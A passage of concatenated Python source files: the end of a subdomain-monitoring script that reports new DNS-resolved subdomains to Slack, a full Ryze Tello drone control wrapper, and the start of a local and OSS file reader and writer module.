global input
if domain_to_monitor:
if sldb.domain_exists(domain_to_monitor):
print(colored("[!] The domain name {} is already being monitored.".format(domain_to_monitor), "red"))
sys.exit(1)
sldb.add_domain(domain_to_monitor) # Adding new domain for monitoring.
response = cert_database().lookup(domain_to_monitor)
print(colored("\n[+] Adding {} to the monitored list of domains.\n".format(domain_to_monitor), "yellow"))
if response:
sldb.insert_subdomains(domain_name=domain_to_monitor, subdomains=response) #saving a copy of current subdomains retreived for the new domain.
try: input = raw_input #fixes python 2.x and 3.x input keyword
except NameError: pass
choice = input(colored("[?] Do you wish to list subdomains found for {}? [Y]es [N]o (default: [N]) ".format(domain_to_monitor), "yellow")) #listing subdomains upon request
if choice.upper() == "Y":
for subdomain in response:
unique_list.append(subdomain)
unique_list = list(set(unique_list))
for subdomain in unique_list:
print(colored(subdomain, "yellow"))
else:
sys.exit(1)
else:
print(colored("\n[!] Unfortunately, we couldn't find any subdomain for {}".format(domain_to_monitor), "red"))
else: #checks if a domain is monitored but has no text file saved in ./output
try:
line = q1.get(timeout=10)
if not sldb.domain_exists(line):
response = cert_database().lookup(line)
if response:
sldb.insert_subdomains(domain_name=line, subdomains=response)
else: pass
else: pass
except queue.Empty:
pass
def check_new_subdomains(q2): #retrieves new list of subdomains and stores a temporary text file for comparaison purposes
global domain_to_monitor
global domain_to_delete
if domain_to_monitor is None:
if domain_to_delete is None:
try:
line = q2.get(timeout=10)
print("[*] Checking {}".format(line))
with open("./output/" + line.lower() + "_tmp.txt", "a") as subs:
response = cert_database().lookup(line)
if response:
for subdomain in response:
subs.write(subdomain + "\n")
except queue.Empty:
pass
else: pass
def compare_files_diff(domain_to_monitor): #compares the temporary text file with previously stored copy to check if there are new subdomains
global enable_logging
if domain_to_monitor is None:
if domain_to_delete is None:
result = []
for domain in sldb.get_all_domains():
subdomains_lookup = cert_database().lookup(domain)
all_subdomains = sldb.get_all_subdomains(domain)
new_subdomains = list(set(subdomains_lookup) - set(all_subdomains))
[result.append(i) for i in new_subdomains]
return(result)
def dns_resolution(new_subdomains): #Perform DNS resolution on retrieved subdomains
dns_results = {}
subdomains_to_resolve = new_subdomains
print(colored("\n[!] Performing DNS resolution. Please do not interrupt!", "red"))
for domain in subdomains_to_resolve:
domain = domain.replace('+ ','')
domain = domain.replace('*.','')
dns_results[domain] = {}
try:
for qtype in ['A','CNAME']:
dns_output = dns.resolver.query(domain,qtype, raise_on_no_answer = False)
if dns_output.rrset is None:
pass
elif dns_output.rdtype == 1:
a_records = [str(i) for i in dns_output.rrset]
dns_results[domain]["A"] = a_records
elif dns_output.rdtype == 5:
cname_records = [str(i) for i in dns_output.rrset]
dns_results[domain]["CNAME"] = cname_records
else: pass
except dns.resolver.NXDOMAIN:
pass
except dns.resolver.Timeout:
dns_results[domain]["A"] = eval('["Timed out while resolving."]')
dns_results[domain]["CNAME"] = eval('["Timed out error while resolving."]')
pass
except dns.exception.DNSException:
dns_results[domain]["A"] = eval('["There was an error while resolving."]')
dns_results[domain]["CNAME"] = eval('["There was an error while resolving."]')
pass
if dns_results:
return posting_to_slack(None, True, dns_results) #Slack new subdomains with DNS ouput
else:
return posting_to_slack(None, False, None) #Nothing found notification
def at_channel(): #control slack @channel
return("<!channel> " if cfg.slack['at_channel_enabled'] else "")
def posting_to_slack(result, dns_resolve, dns_output): #sending result to slack workplace
global domain_to_monitor
global new_subdomains
if dns_resolve:
dns_result = dns_output
if dns_result:
dns_result = {k:v for k,v in dns_result.items() if v} #filters non-resolving subdomains
rev_url = []
print(colored("\n[!] Exporting result to Slack. Please do not interrupt!", "red"))
unique_list = list(set(new_subdomains) & set(dns_result.keys())) #filters non-resolving subdomains from new_subdomains list
for subdomain in unique_list:
data = "{}:new: {}".format(at_channel(), subdomain)
slack(data)
try:
if dns_result[subdomain]["A"]:
for i in dns_result[subdomain]["A"]:
data = "```A : {}```".format(i)
slack(data)
except: pass
try:
if dns_result[subdomain]['CNAME']:
for i in dns_result[subdomain]['CNAME']:
data = "```CNAME : {}```".format(i)
slack(data)
except: pass
print(colored("\n[!] Done. ", "green"))
for subdomain in unique_list:
sldb.insert_subdomains(get_fld(subdomain, fix_protocol = True), subdomain)
elif len(result) > 0:
rev_url = []
data = ":new:{} New subdomains found!:new: {}\n\n".format(len(result), at_channel())
print(colored("\n[!] Exporting the result to Slack. Please don't interrupt!", "red"))
for url in result:
url = "https://{}\n".format(url.replace('+ ', ''))
data += "{}".format(url)
slack(data)
print(colored("\n[!] Done. ", "green"))
for subdomain in result:
sldb.insert_subdomains(get_fld(subdomain, fix_protocol = True), subdomain)
else:
if not domain_to_monitor:
data = "{}:-1: We couldn't find any new valid subdomains.".format(at_channel())
slack(data)
print(colored("\n[!] Done. ", "green"))
else: pass
def multithreading(threads):
global domain_to_monitor
threads_list = []
if not domain_to_monitor:
num = len(sldb.get_all_domains())
for i in range(max(threads, num)):
if not (q1.empty() and q2.empty()):
t1 = threading.Thread(target = adding_new_domain, args = (q1, ))
#t2 = threading.Thread(target = check_new_subdomains, args = (q2, ))
t1.start()
#t2.start()
threads_list.append(t1)
#threads_list.append(t2)
else:
adding_new_domain(domain_to_monitor)
for t in threads_list:
t.join()
if __name__ == '__main__':
#Setup connection to database
sldb = SLDB(conn_string = cfg.sldb['conn_string'])
#parse arguments
dns_resolve = parse_args().resolve
enable_logging = parse_args().logging
list_domains = parse_args().listing
domain_to_monitor = domain_sanity_check(parse_args().target)
domain_to_delete = domain_sanity_check(parse_args().remove_domain)
do_reset = parse_args().reset
#execute the various functions
banner()
reset(do_reset)
remove_domain(domain_to_delete)
domains_listing()
queuing()
multithreading(parse_args().threads)
new_subdomains = compare_files_diff(domain_to_monitor)
# Check if DNS resolution is checked
if not domain_to_monitor:
if (dns_resolve and len(new_subdomains) > 0):
dns_resolution(new_subdomains)
else:
posting_to_slack(new_subdomains, False, None)
else: pass
#Tear down connection to database
sldb.session.close()
sldb.session.remove()
|
tello.py
|
# coding=utf-8
import logging
import socket
import time
import threading
import cv2 # type: ignore
from threading import Thread
from typing import Optional
from enforce_types import enforce_types
threads_initialized = False
drones: Optional[dict] = {}
client_socket: socket.socket
@enforce_types
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
[1.3](https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf),
[2.0 with EDU-only commands](https://dl-cdn.ryzerobotics.com/downloads/Tello/Tello%20SDK%202.0%20User%20Guide.pdf)
"""
# Send and receive commands, client socket
RESPONSE_TIMEOUT = 7 # in seconds
TIME_BTW_COMMANDS = 0.1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.001 # in seconds
RETRY_COUNT = 3 # number of retries after a failed command
TELLO_IP = '192.168.10.1' # Tello IP address
# Video stream, server socket
VS_UDP_IP = '0.0.0.0'
VS_UDP_PORT = 11111
CONTROL_UDP_PORT = 8889
STATE_UDP_PORT = 8890
# Set up logger
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('[%(levelname)s] %(filename)s - %(lineno)d - %(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
# use Tello.LOGGER.setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# conversion functions for state protocol fields
state_field_converters = {
# Tello EDU with mission pads enabled only
'mid': int,
'x': int,
'y': int,
'z': int,
# 'mpry': (custom format 'x,y,z')
# common entries
'pitch': int,
'roll': int,
'yaw': int,
'vgx': int,
'vgy': int,
'vgz': int,
'templ': int,
'temph': int,
'tof': int,
'h': int,
'bat': int,
'baro': float,
'time': int,
'agx': float,
'agy': float,
'agz': float,
}
# VideoCapture object
cap: Optional[cv2.VideoCapture] = None
background_frame_read: Optional['BackgroundFrameRead'] = None
stream_on = False
is_flying = False
def __init__(self,
host=TELLO_IP,
retry_count=RETRY_COUNT):
global threads_initialized, drones
self.address = (host, Tello.CONTROL_UDP_PORT)
self.stream_on = False
self.retry_count = retry_count
self.last_received_command_timestamp = time.time()
self.last_rc_control_timestamp = time.time()
if not threads_initialized:
# Run Tello command responses UDP receiver on background
response_receiver_thread = threading.Thread(target=Tello.udp_response_receiver)
response_receiver_thread.daemon = True
response_receiver_thread.start()
# Run state UDP receiver on background
state_receiver_thread = threading.Thread(target=Tello.udp_state_receiver)
state_receiver_thread.daemon = True
state_receiver_thread.start()
threads_initialized = True
drones[host] = {
'responses': [],
'state': {},
}
def get_own_udp_object(self):
global drones
host = self.address[0]
return drones[host]
@staticmethod
def udp_response_receiver():
"""Setup drone UDP receiver. This method listens for responses of Tello.
Must be run from a background thread in order to not block the main thread.
Internal method, you normally wouldn't call this yourself.
"""
global client_socket
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_socket.bind(('', Tello.CONTROL_UDP_PORT))
while True:
try:
data, address = client_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at client_socket'.format(address))
if address not in drones:
continue
drones[address]['responses'].append(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def udp_state_receiver():
"""Setup state UDP receiver. This method listens for state information from
Tello. Must be run from a background thread in order to not block
the main thread.
Internal method, you normally wouldn't call this yourself.
"""
state_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
state_socket.bind(('', Tello.STATE_UDP_PORT))
while True:
try:
data, address = state_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at state_socket'.format(address))
if address not in drones:
continue
data = data.decode('ASCII')
drones[address]['state'] = Tello.parse_state(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def parse_state(state: str) -> dict:
"""Parse a state line to a dictionary
Internal method, you normally wouldn't call this yourself.
"""
state = state.strip()
Tello.LOGGER.debug('Raw state data: {}'.format(state))
if state == 'ok':
return {}
state_dict = {}
for field in state.split(';'):
split = field.split(':')
if len(split) < 2:
continue
key = split[0]
value = split[1]
if key in Tello.state_field_converters:
try:
value = Tello.state_field_converters[key](value)
except Exception as e:
Tello.LOGGER.debug('Error parsing state value for {}: {} to {}'
.format(key, value, Tello.state_field_converters[key]))
Tello.LOGGER.error(e)
state_dict[key] = value
return state_dict
def get_current_state(self) -> dict:
"""Call this function to attain the state of the Tello. Returns a dict
with all fields.
Internal method, you normally wouldn't call this yourself.
"""
return self.get_own_udp_object()['state']
def get_state_field(self, key: str):
"""Get a specific sate field by name.
Internal method, you normally wouldn't call this yourself.
"""
state = self.get_current_state()
if key in state:
return state[key]
else:
raise Exception('Could not get state property ' + key)
def get_mission_pad_id(self) -> int:
"""Mission pad ID of the currently detected mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: -1 if none is detected, else 1-8
"""
return self.get_state_field('mid')
def get_mission_pad_distance_x(self) -> int:
"""X distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('x')
def get_mission_pad_distance_y(self) -> int:
"""Y distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('y')
def get_mission_pad_distance_z(self) -> int:
"""Z distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('z')
def get_pitch(self) -> int:
"""Get pitch in degree
Returns:
int: pitch in degree
"""
return self.get_state_field('pitch')
def get_roll(self) -> int:
"""Get roll in degree
Returns:
int: roll in degree
"""
return self.get_state_field('roll')
def get_yaw(self) -> int:
"""Get yaw in degree
Returns:
int: yaw in degree
"""
return self.get_state_field('yaw')
def get_speed_x(self) -> int:
"""X-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgx')
def get_speed_y(self) -> int:
"""Y-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgy')
def get_speed_z(self) -> int:
"""Z-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgz')
def get_acceleration_x(self) -> float:
"""X-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agx')
def get_acceleration_y(self) -> float:
"""Y-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agy')
def get_acceleration_z(self) -> float:
"""Z-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agz')
def get_lowest_temperature(self) -> int:
"""Get lowest temperature
Returns:
int: lowest temperature (°C)
"""
return self.get_state_field('templ')
def get_highest_temperature(self) -> int:
"""Get highest temperature
Returns:
float: highest temperature (°C)
"""
return self.get_state_field('temph')
def get_temperature(self) -> float:
"""Get average temperature
Returns:
float: average temperature (°C)
"""
templ = self.get_lowest_temperature()
temph = self.get_highest_temperature()
return (templ + temph) / 2
def get_height(self) -> int:
"""Get current height in cm
Returns:
int: height in cm
"""
return self.get_state_field('h')
def get_distance_tof(self) -> int:
"""Get current distance value from TOF in cm
Returns:
int: TOF distance in cm
"""
return self.get_state_field('tof')
def get_barometer(self) -> int:
"""Get current barometer measurement in cm
This resembles the absolute height.
See https://en.wikipedia.org/wiki/Altimeter
Returns:
int: barometer measurement in cm
"""
return self.get_state_field('baro') * 100
def get_flight_time(self) -> int:
"""Get the time the motors have been active in seconds
Returns:
int: flight time in s
"""
return self.get_state_field('time')
def get_battery(self) -> int:
"""Get current battery percentage
Returns:
int: 0-100
"""
return self.get_state_field('bat')
def get_udp_video_address(self) -> str:
"""Internal method, you normally wouldn't call this youself.
"""
return 'udp://@' + self.VS_UDP_IP + ':' + str(self.VS_UDP_PORT) # + '?overrun_nonfatal=1&fifo_size=5000'
def get_video_capture(self):
"""Get the VideoCapture object from the camera drone.
Users usually want to use get_frame_read instead.
Returns:
VideoCapture
"""
if self.cap is None:
self.cap = cv2.VideoCapture(self.get_udp_video_address())
if not self.cap.isOpened():
self.cap.open(self.get_udp_video_address())
return self.cap
def get_frame_read(self) -> 'BackgroundFrameRead':
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
self.background_frame_read = BackgroundFrameRead(self, self.get_udp_video_address()).start()
return self.background_frame_read
def stop_video_capture(self):
return self.streamoff()
def send_command_with_return(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> str:
"""Send command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
Return:
bool/str: str with response text on success, False when unsuccessfull.
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
diff = time.time() - self.last_received_command_timestamp
if diff < self.TIME_BTW_COMMANDS:
self.LOGGER.debug('Waiting {} seconds to execute command {}...'.format(diff, command))
time.sleep(diff)
self.LOGGER.info('Send command: ' + command)
timestamp = time.time()
client_socket.sendto(command.encode('utf-8'), self.address)
responses = self.get_own_udp_object()['responses']
while len(responses) == 0:
if time.time() - timestamp > timeout:
self.LOGGER.warning('Timeout exceed on command ' + command)
return "Timeout error!"
else:
time.sleep(0.1)
self.last_received_command_timestamp = time.time()
response = responses.pop(0)
response = response.decode('utf-8').rstrip("\r\n")
self.LOGGER.info('Response {}: {}'.format(command, response))
return response
def send_command_without_return(self, command: str):
"""Send command to Tello without expecting a response.
Internal method, you normally wouldn't call this yourself.
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
self.LOGGER.info('Send command (no expect response): ' + command)
client_socket.sendto(command.encode('utf-8'), self.address)
def send_control_command(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> bool:
"""Send control command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = "max retries exceeded"
for i in range(0, self.retry_count):
response = self.send_command_with_return(command, timeout=timeout)
if response == 'OK' or response == 'ok':
return True
self.LOGGER.debug('Command attempt {} for {} failed'.format(i, command))
self.raise_result_error(command, response)
return False # never reached
def send_read_command(self, command: str) -> str:
"""Send given command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
pass
if ('error' not in response) and ('ERROR' not in response) and ('False' not in response):
return response
if response.isdigit():
return int(response)
else:
try:
return float(response) # isdigit() is False when the number is a float(barometer)
except ValueError:
return response
else:
self.raise_result_error(command, response)
return "error: this code should never be reached"
def send_read_command_int(self, command: str) -> int:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return int(response)
def send_read_command_float(self, command: str) -> float:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return float(response)
def raise_result_error(self, command: str, response: str) -> bool:
raise Exception('Command {} was unsuccessful. Message: {}'.format(command, response))
def connect(self):
"""Enter SDK mode. Call this before any of the control functions.
"""
self.send_control_command("command")
def takeoff(self):
"""Automatic takeoff
"""
# Something it takes a looooot of time to take off and return a succesful take off.
# So we better wait. If not, is going to give us error on the following calls.
self.send_control_command("takeoff", timeout=20)
self.is_flying = True
def land(self):
"""Automatic land
"""
self.send_control_command("land")
self.is_flying = False
def streamon(self):
"""Turn on video streaming. Use `tello.get_frame_read` afterwards.
Video Streaming is supported on all tellos when in AP mode (i.e.
when your computer is connected to Tello-XXXXXX WiFi ntwork).
Currently Tello EDUs do not support video streaming while connected
to a wifi network.
!!! note
If the response is 'Unknown command' you have to update the Tello
firmware. This can be done using the official Tello app.
"""
self.send_control_command("streamon")
self.stream_on = True
def streamoff(self):
"""Turn off video streaming.
"""
self.send_control_command("streamoff")
self.stream_on = False
def emergency(self):
"""Stop all motors immediately.
"""
self.send_control_command("emergency")
def move(self, direction: str, x: int):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Users would normally call one of the move_x functions instead.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
"""
self.send_control_command(direction + ' ' + str(x))
def move_up(self, x: int):
"""Fly x cm up.
Arguments:
x: 20-500
"""
self.move("up", x)
def move_down(self, x: int):
"""Fly x cm down.
Arguments:
x: 20-500
"""
self.move("down", x)
def move_left(self, x: int):
"""Fly x cm left.
Arguments:
x: 20-500
"""
self.move("left", x)
def move_right(self, x: int):
"""Fly x cm right.
Arguments:
x: 20-500
"""
self.move("right", x)
def move_forward(self, x: int):
"""Fly x cm forward.
Arguments:
x: 20-500
"""
self.move("forward", x)
def move_back(self, x: int):
"""Fly x cm backwards.
Arguments:
x: 20-500
"""
self.move("back", x)
def rotate_clockwise(self, x: int):
"""Rotate x degree clockwise.
Arguments:
x: 1-360
"""
self.send_control_command("cw " + str(x))
def rotate_counter_clockwise(self, x: int):
"""Rotate x degree counter-clockwise.
Arguments:
x: 1-3600
"""
self.send_control_command("ccw " + str(x))
def flip(self, direction: str):
"""Do a flip maneuver.
Users would normally call one of the flip_x functions instead.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
"""
self.send_control_command("flip " + direction)
def flip_left(self):
"""Flip to the left.
"""
self.flip("l")
def flip_right(self):
"""Flip to the right.
"""
self.flip("r")
def flip_forward(self):
"""Flip forward.
"""
self.flip("f")
def flip_back(self):
"""Flip backwards.
"""
self.flip("b")
def go_xyz_speed(self, x: int, y: int, z: int, speed: int):
"""Fly to x y z relative to the current position.
Speed defines the traveling speed in cm/s.
Arguments:
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
"""
self.send_control_command('go %s %s %s %s' % (x, y, z, speed))
def curve_xyz_speed(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the current position
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
x2: -500-500
y1: -500-500
y2: -500-500
z1: -500-500
z2: -500-500
speed: 10-60
"""
self.send_control_command('curve %s %s %s %s %s %s %s' % (x1, y1, z1, x2, y2, z2, speed))
def go_xyz_speed_mid(self, x: int, y: int, z: int, speed: int, mid: int):
"""Fly to x y z relative to the mission pad with id mid.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
"""
self.send_control_command('go %s %s %s %s m%s' % (x, y, z, speed, mid))
def curve_xyz_speed_mid(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int, mid: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the mission pad with id mid.
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
"""
self.send_control_command('curve %s %s %s %s %s %s %s m%s' % (x1, y1, z1, x2, y2, z2, speed, mid))
def go_xyz_speed_yaw_mid(self, x: int, y: int, z: int, speed: int, yaw: int, mid1: int, mid2: int):
"""Fly to x y z relative to mid1.
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
"""
self.send_control_command('jump %s %s %s %s %s m%s m%s' % (x, y, z, speed, yaw, mid1, mid2))
def enable_mission_pads(self):
"""Enable mission pad detection
"""
self.send_control_command("mon")
def disable_mission_pads(self):
"""Disable mission pad detection
"""
self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
"""Set mission pad detection direction. enable_mission_pads needs to be
called first. When detecting both directions detecting frequency is 10Hz,
otherwise the detection frequency is 20Hz.
Arguments:
x: 0 downwards only, 1 forwards only, 2 both directions
"""
self.send_control_command("mdirection " + str(x))
def set_speed(self, x: int):
"""Set speed to x cm/s.
Arguments:
x: 10-100
"""
self.send_control_command("speed " + str(x))
def send_rc_control(self, left_right_velocity: int, forward_backward_velocity: int, up_down_velocity: int,
yaw_velocity: int):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
"""
def round_to_100(x: int):
if x > 100:
return 100
if x < -100:
return -100
return x
if time.time() - self.last_rc_control_timestamp > self.TIME_BTW_RC_CONTROL_COMMANDS:
self.last_rc_control_timestamp = time.time()
self.send_command_without_return('rc %s %s %s %s' % (round_to_100(left_right_velocity),
round_to_100(forward_backward_velocity),
round_to_100(up_down_velocity),
round_to_100(yaw_velocity)))
def set_wifi_credentials(self, ssid, password):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
"""
self.send_command_without_return('wifi %s %s' % (ssid, password))
def connect_to_wifi(self, ssid, password):
"""Connects to the Wi-Fi with SSID and password.
After this command the tello will reboot.
Only works with Tello EDUs.
"""
self.send_command_without_return('ap %s %s' % (ssid, password))
def query_speed(self) -> int:
"""Query speed setting (cm/s)
Returns:
int: 1-100
"""
return self.send_read_command_int('speed?')
def query_battery(self) -> int:
"""Get current battery percentage via a query command
Using get_battery is usually faster
Returns:
int: 0-100 in %
"""
return self.send_read_command_int('battery?')
def query_flight_time(self) -> int:
"""Query current fly time (s).
Using get_flight_time is usually faster.
Returns:
int: Seconds elapsed during flight.
"""
return self.send_read_command_int('time?')
def query_height(self) -> int:
"""Get height in cm via a query command.
Using get_height is usually faster
Returns:
int: 0-3000
"""
return self.send_read_command_int('height?')
def query_temperature(self) -> int:
"""Query temperature (°C).
Using get_temperature is usually faster.
Returns:
int: 0-90
"""
return self.send_read_command_int('temp?')
def query_attitude(self) -> dict:
"""Query IMU attitude data.
Using get_pitch, get_roll and get_yaw is usually faster.
Returns:
{'pitch': int, 'roll': int, 'yaw': int}
"""
response = self.send_read_command('attitude?')
return Tello.parse_state(response)
def query_barometer(self) -> int:
"""Get barometer value (cm)
Using get_barometer is usually faster.
Returns:
int: 0-100
"""
return self.send_read_command_int('baro?') * 100
def query_distance_tof(self) -> float:
"""Get distance value from TOF (cm)
Using get_distance_tof is usually faster.
Returns:
float: 30-1000
"""
# example response: 801mm
return int(self.send_read_command('tof?')[:-2]) / 10
def query_wifi_signal_noise_ratio(self) -> str:
"""Get Wi-Fi SNR
Returns:
str: snr
"""
return self.send_read_command('wifi?')
def query_sdk_version(self) -> str:
"""Get SDK Version
Returns:
str: SDK Version
"""
return self.send_read_command('sdk?')
def query_serial_number(self) -> str:
"""Get Serial Number
Returns:
str: Serial Number
"""
return self.send_read_command('sn?')
def end(self):
"""Call this method when you want to end the tello object
"""
if self.is_flying:
self.land()
if self.stream_on:
self.streamoff()
if self.background_frame_read is not None:
self.background_frame_read.stop()
if self.cap is not None:
self.cap.release()
host = self.address[0]
if host in drones:
del drones[host]
def __del__(self):
self.end()
class BackgroundFrameRead:
"""
This class read frames from a VideoCapture in background. Use
backgroundFrameRead.frame to get the current frame.
"""
def __init__(self, tello, address):
tello.cap = cv2.VideoCapture(address)
self.cap = tello.cap
if not self.cap.isOpened():
self.cap.open(address)
self.grabbed, self.frame = self.cap.read()
self.stopped = False
def start(self):
Thread(target=self.update_frame, args=(), daemon=True).start()
return self
def update_frame(self):
while not self.stopped:
if not self.grabbed or not self.cap.isOpened():
self.stop()
else:
(self.grabbed, self.frame) = self.cap.read()
def stop(self):
self.stopped = True
|
ioutil.py
|
import os
import io
import json
import oss2
import cv2
import configparser
import enum
import numpy as np
from PIL import Image
from typing import Any, Union, Dict, List, Tuple
from multiprocessing import Queue, Process, Pool
from loguru import logger
class StoreType(enum.Enum):
def __new__(cls, *args, **kwargs):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __init__(self, type_name: str):
self.type_name = type_name
LOCAL = "local"
OSS = "oss"
class DataType(enum.Enum):
def __new__(cls, *args, **kwargs):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __init__(self, type_name: str):
self.type_name = type_name
BYTES = "bytes"
IMAGE = "image"
NUMPY = "numpy"
JSON = "json"
# do nothing, just return input
DUMMY = "dummy"
def read_oss_config(path: str) -> Dict[str, Any]:
oss_src_config = configparser.ConfigParser()
oss_src_config.read(os.path.expanduser(path))
return oss_src_config['Credentials']
def create_oss_bucket(oss_config: Union[Dict[str, str], str]) -> oss2.Bucket:
if isinstance(oss_config, str):
oss_config = read_oss_config(oss_config)
auth = oss2.Auth(oss_config['accessKeyID'], oss_config['accessKeySecret'])
return oss2.Bucket(auth, endpoint=oss_config['endpoint'], bucket_name=oss_config['bucket'])
class Reader(object):
def read(self, path):
raise NotImplementedError
def oss_read(bucket, key, oss_root=None):
path = os.path.join(oss_root, key) if oss_root else key
data_bytes = bucket.get_object(path).read()
return data_bytes
class OssReader(Reader):
def __init__(self, oss_config: str):
self.bucket = create_oss_bucket(oss_config)
def read(self, path):
return oss_read(self.bucket, path)
class LocalReader(Reader):
def read(self, path):
return open(path, 'rb').read()
class DummyReader(Reader):
def __init__(self, reader: Reader):
self.reader = reader
def read(self, path):
return path
class BytesReader(Reader):
def __init__(self, reader: Reader):
self.reader = reader
def read(self, path):
return self.reader.read(path)
class ImageReader(Reader):
def __init__(self, reader: Reader):
self.reader = reader
def read(self, path) -> np.ndarray:
return Image.open(io.BytesIO(self.reader.read(path)))
class NumpyReader(Reader):
def __init__(self, reader: Reader):
self.reader = reader
def read(self, path) -> Union[np.ndarray, dict]:
if path.endswith("npz"):
with np.load(io.BytesIO(self.reader.read(path))) as data:
return dict(data)
return np.load(io.BytesIO(self.reader.read(path)))
class JsonReader(Reader):
def __init__(self, reader: Reader):
self.reader = reader
def read(self, path) -> Union[np.ndarray, dict]:
return json.load(io.BytesIO(self.reader.read(path)))
def build_reader(store_type: str, data_type: str, **kwargs) -> Reader:
if store_type == StoreType.LOCAL.type_name:
reader = LocalReader()
elif store_type == StoreType.OSS.type_name:
reader = OssReader(**kwargs)
else:
raise ValueError(f"Unknown store type: {store_type}")
if data_type == DataType.BYTES.type_name:
return BytesReader(reader)
elif data_type == DataType.IMAGE.type_name:
return ImageReader(reader)
elif data_type == DataType.NUMPY.type_name:
return NumpyReader(reader)
elif data_type == DataType.JSON.type_name:
return JsonReader(reader)
elif data_type == DataType.DUMMY.type_name:
return DummyReader(reader)
else:
raise ValueError(f"Unknown data type: {data_type}")
class Writer(object):
def write(self, path: str, data: Any):
raise NotImplementedError
class OssWriter(Writer):
def __init__(self, oss_config: str):
self.bucket = create_oss_bucket(oss_config)
def write(self, path, data: bytes):
return self.bucket.put_object(path, data)
class LocalWriter(Writer):
def write(self, path, obj: bytes):
return open(path, 'wb').write(obj)
class BytesWriter(Writer):
def __init__(self, writer: Writer):
self.writer = writer
def write(self, path: str, data: Union[bytes, str]):
if isinstance(data, str):
data = data.encode('utf-8')
return self.writer.write(path, data)
class ImageWriter(Writer):
def __init__(self, writer: Writer):
self.writer = writer
def write(self, path: str, data: np.ndarray):
ext = os.path.splitext(path)[-1]
ret, img = cv2.imencode(ext, data)
return self.writer.write(path, img.tobytes())
class NumpyWriter(Writer):
def __init__(self, writer: Writer):
self.writer = writer
def write(self, path:str, data: Union[np.ndarray, dict]):
output = io.BytesIO()
if path.endswith("npz"):
if isinstance(data, list):
np.savez(output, *data)
elif isinstance(data, dict):
np.savez(output, **data)
else:
raise ValueError('invalid type: {} to save to {}', type(data), path)
else:
if isinstance(data, np.ndarray):
